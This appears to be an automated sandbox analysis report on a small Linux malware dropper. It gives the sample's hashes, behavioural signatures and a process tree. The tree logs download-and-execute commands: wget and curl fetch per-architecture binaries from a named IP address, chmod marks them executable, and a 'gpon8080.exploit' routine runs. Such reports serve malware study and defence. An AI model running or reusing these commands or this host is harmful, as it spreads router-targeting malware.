Analysis
- max time kernel: 99s
- max time network: 101s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240729-en
- resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 28-07-2024 16:40
Static task: static1

Behavioral task: behavioral1
- Sample: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Resource: ubuntu1804-amd64-20240729-en

Behavioral task: behavioral2
- Sample: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Resource: debian9-armhf-20240729-en

Behavioral task: behavioral3
- Sample: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Resource: debian9-mipsbe-20240729-en

Behavioral task: behavioral4
- Sample: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Resource: debian9-mipsel-20240729-en
General
- Target: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Size: 3KB
- MD5: 17f41b4b65e5ddad4a76594560d43927
- SHA1: bb7691396c850ff2b4645b90336852650aa26eb6
- SHA256: 36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
- SHA512: 602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322
Malware Config
Signatures
- Executes dropped EXE (13 IoCs)
  Processes: g0away (13 instances)
  ioc          pid  process
  /tmp/g0away  722  g0away
  /tmp/g0away  728  g0away
  /tmp/g0away  734  g0away
  /tmp/g0away  743  g0away
  /tmp/g0away  749  g0away
  /tmp/g0away  755  g0away
  /tmp/g0away  761  g0away
  /tmp/g0away  767  g0away
  /tmp/g0away  773  g0away
  /tmp/g0away  779  g0away
  /tmp/g0away  785  g0away
  /tmp/g0away  791  g0away
  /tmp/g0away  797  g0away

- Reads runtime system information (13 IoCs)
  Reads data from /proc virtual filesystem.
  Processes: curl (13 instances)
  description               ioc                             process
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  (13 identical rows)

- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  Processes: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
  description                    ioc          process
  File opened for modification   /tmp/g0away  17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Processes
- PID:714  /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
  command: /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
  signatures: Writes file to tmp directory
  - PID:715  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
  - PID:719  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
    signatures: Reads runtime system information
  - PID:720  /bin/cat
    command: cat m3th.x86
  - PID:721  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE
  - PID:722  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:724  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
  - PID:725  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
    signatures: Reads runtime system information
  - PID:726  /bin/cat
    command: cat m3th.mips
  - PID:727  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE
  - PID:728  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:730  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
  - PID:731  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
    signatures: Reads runtime system information
  - PID:732  /bin/cat
    command: cat m3th.mpsl
  - PID:733  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE
  - PID:734  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:736  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
  - PID:737  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
    signatures: Reads runtime system information
  - PID:741  /bin/cat
    command: cat m3th.arm
  - PID:742  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:743  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:745  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
  - PID:746  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
    signatures: Reads runtime system information
  - PID:747  /bin/cat
    command: cat m3th.arm5
  - PID:748  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:749  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:751  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
  - PID:752  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
    signatures: Reads runtime system information
  - PID:753  /bin/cat
    command: cat m3th.arm6
  - PID:754  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:755  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:757  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
  - PID:758  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
    signatures: Reads runtime system information
  - PID:759  /bin/cat
    command: cat m3th.arm7
  - PID:760  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:761  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:763  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
  - PID:764  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
    signatures: Reads runtime system information
  - PID:765  /bin/cat
    command: cat m3th.ppc
  - PID:766  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:767  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:769  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
  - PID:770  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
    signatures: Reads runtime system information
  - PID:771  /bin/cat
    command: cat m3th.m68k
  - PID:772  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:773  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:775  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
  - PID:776  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
    signatures: Reads runtime system information
  - PID:777  /bin/cat
    command: cat m3th.spc
  - PID:778  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:779  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:781  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
  - PID:782  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
    signatures: Reads runtime system information
  - PID:783  /bin/cat
    command: cat m3th.i686
  - PID:784  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:785  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:787  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
  - PID:788  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
    signatures: Reads runtime system information
  - PID:789  /bin/cat
    command: cat m3th.sh4
  - PID:790  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:791  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE
  - PID:793  /usr/bin/wget
    command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
  - PID:794  /usr/bin/curl
    command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
    signatures: Reads runtime system information
  - PID:795  /bin/cat
    command: cat m3th.arc
  - PID:796  /bin/chmod
    command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
  - PID:797  /tmp/g0away
    command: ./g0away gpon8080.exploit
    signatures: Executes dropped EXE